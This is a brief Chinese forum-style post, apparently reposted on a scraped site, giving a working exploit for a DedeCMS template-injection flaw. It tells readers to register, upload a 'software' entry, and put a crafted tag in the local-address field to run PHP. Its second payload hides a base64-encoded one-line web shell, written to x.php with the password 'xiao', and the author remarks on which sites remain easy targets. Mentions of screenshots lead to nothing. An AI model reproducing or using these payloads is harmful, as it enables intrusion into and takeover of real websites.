說下利用方法:注冊會員,上傳軟件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},發(fā)表后查看或修改即可執(zhí)行,
dedecms最新漏洞漏洞預(yù)警
。生成的解析文件內(nèi)容如下:
成功之后的效果
這漏洞雞肋之處在于經(jīng)歷上次的0day沖擊后,很多站點(diǎn)已經(jīng)關(guān)閉了會員功能或者直接刪除了member目錄,并且沒有多少站會有軟件欄目的,嗯 ,所以搞搞 下載站之類的差不多了 所以比較悲哀吧,哈哈,
電腦資料
《dedecms最新漏洞漏洞預(yù)警》(http://clearvueentertainment.com)。a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密碼:xiao直接生成一句話。密碼xiao 大家懂得。不了解自己解密去。。。